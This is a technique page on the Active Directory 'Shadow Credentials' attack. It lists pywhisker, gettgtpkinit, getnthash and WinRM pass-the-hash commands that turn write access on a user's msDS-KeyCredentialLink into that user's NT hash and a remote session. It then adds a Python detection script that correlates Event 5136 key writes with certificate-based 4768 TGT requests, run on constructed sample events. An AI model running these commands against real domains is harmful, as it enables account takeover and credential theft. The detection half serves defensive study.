Technique

Shadow Credentials


1.1 Add a key credential to the target user

pywhisker writes a new key credential (the public key of a generated certificate) into the target account's msDS-KeyCredentialLink attribute, which requires write access to that attribute on the target. It saves the certificate as a .pfx file and prints the .pfx password; both are used in 1.2.

python pywhisker.py -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'

1.2 Get a TGT PKI

Request a TGT with PKINIT using the certificate from 1.1, write it to a ccache, and note the AS-REP encryption key that gettgtpkinit.py prints: getnthash.py needs it in the next step.

python gettgtpkinit.py -cert-pfx ../pywhisker/$cert.pfx -pfx-pass $cert_pass domain.local/$targetuser $targetuser.ccache
export KRB5CCNAME=$targetuser.ccache

1.3 Recover NT Hash

getnthash.py uses the TGT in KRB5CCNAME to request a user-to-user service ticket for the account and decrypts the PAC credential information with the AS-REP key, yielding the NT hash.

python getnthash.py -key $asrep_key domain.local/$targetuser

1.4 Profit

winrm -i $ip -u $targetuser -H $hash
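Added detection example, not part of the original page and not code from pywhisker or PKINITtools: the two log signals the procedure above leaves behind are a write to msDS-KeyCredentialLink (Security Event 5136, operation "Value Added") followed by a TGT request for the same account that carries certificate information (Event 4768 with the certificate fields populated, i.e. PKINIT pre-authentication). The script correlates the two per account within a time window. The sample events are constructed, their field names are shortened versions of the 5136/4768 message fields, and the self_write heuristic (the account writing its own key looks like device enrolment, another principal writing it looks like this technique) is a triage assumption, not a documented rule.

```python
"""Correlate msDS-KeyCredentialLink writes (Event 5136) with later
certificate-based TGT requests (Event 4768 with certificate fields).
Hypothetical helper for this page; sample data is constructed."""
import re
from datetime import datetime, timedelta

CN_RE = re.compile(r"^CN=([^,]+)", re.IGNORECASE)

# Constructed sample events (not real log exports); keys are shortened
# names of the corresponding 5136 / 4768 message fields.
SAMPLE_EVENTS = [
    # Account writes its own key, then authenticates with a certificate.
    {"id": 5136, "time": "2024-05-01T10:00:00", "subject": "DOMAIN\\jdoe",
     "object_dn": "CN=jdoe,CN=Users,DC=domain,DC=local",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"id": 4768, "time": "2024-05-01T10:05:00", "account": "jdoe",
     "cert_issuer": "CN=jdoe", "cert_serial": "01"},
    # Another principal writes the key; the target then authenticates with a certificate.
    {"id": 5136, "time": "2024-05-01T11:00:00", "subject": "DOMAIN\\svc_helpdesk",
     "object_dn": "CN=targetuser,CN=Users,DC=domain,DC=local",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"id": 4768, "time": "2024-05-01T11:02:30", "account": "targetuser",
     "cert_issuer": "CN=targetuser", "cert_serial": "02"},
    # Noise: password pre-auth, unrelated attribute, PKINIT with no prior key write.
    {"id": 4768, "time": "2024-05-01T11:10:00", "account": "targetuser",
     "cert_issuer": "", "cert_serial": ""},
    {"id": 5136, "time": "2024-05-01T12:00:00", "subject": "DOMAIN\\admin",
     "object_dn": "CN=bob,CN=Users,DC=domain,DC=local",
     "attribute": "description", "operation": "Value Added"},
    {"id": 4768, "time": "2024-05-01T09:00:00", "account": "alice",
     "cert_issuer": "CN=Corp-CA", "cert_serial": "1a2b"},
]


def account_from_dn(dn):
    """Return the leftmost CN of a distinguished name, lower-cased."""
    m = CN_RE.match(dn.strip())
    return (m.group(1) if m else dn).lower()


def key_credential_writes(events):
    """5136 events that add a value to msDS-KeyCredentialLink."""
    writes = []
    for e in events:
        if (e["id"] == 5136
                and e["attribute"].lower() == "msds-keycredentiallink"
                and e["operation"] == "Value Added"):
            writes.append({
                "time": datetime.fromisoformat(e["time"]),
                "account": account_from_dn(e["object_dn"]),
                "writer": e["subject"],
            })
    return writes


def pkinit_tgts(events):
    """4768 events whose certificate fields are populated (PKINIT pre-auth)."""
    return [
        {"time": datetime.fromisoformat(e["time"]),
         "account": e["account"].lower(),
         "cert_issuer": e["cert_issuer"]}
        for e in events
        if e["id"] == 4768 and e["cert_issuer"]
    ]


def find_shadow_credential_candidates(events, window_minutes=60):
    """Pair each PKINIT TGT with a key-credential write on the same account
    that happened at most window_minutes earlier. self_write records whether
    the account wrote its own key (assumed enrolment-like) or another
    principal did (assumed suspicious); findings are sorted by TGT time."""
    window = timedelta(minutes=window_minutes)
    writes = key_credential_writes(events)
    findings = []
    for tgt in pkinit_tgts(events):
        for w in writes:
            if w["account"] == tgt["account"] and w["time"] <= tgt["time"] <= w["time"] + window:
                writer_sam = w["writer"].split("\\")[-1].lower()
                findings.append({
                    "account": tgt["account"],
                    "writer": w["writer"],
                    "self_write": writer_sam == tgt["account"],
                    "write_time": w["time"].isoformat(),
                    "tgt_time": tgt["time"].isoformat(),
                    "cert_issuer": tgt["cert_issuer"],
                })
    return sorted(findings, key=lambda f: f["tgt_time"])


if __name__ == "__main__":
    for f in find_shadow_credential_candidates(SAMPLE_EVENTS):
        flag = "self-enrolment" if f["self_write"] else "WRITTEN BY OTHER PRINCIPAL"
        print(f"{f['account']}: key added by {f['writer']} at {f['write_time']}, "
              f"PKINIT TGT at {f['tgt_time']} [{flag}]")
```

On the sample data this yields two candidates, of which only targetuser has its key written by a different principal. Auditing of msDS-KeyCredentialLink writes depends on a SACL for that attribute being in place on user objects, otherwise Event 5136 is never generated and only the 4768 signal remains.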
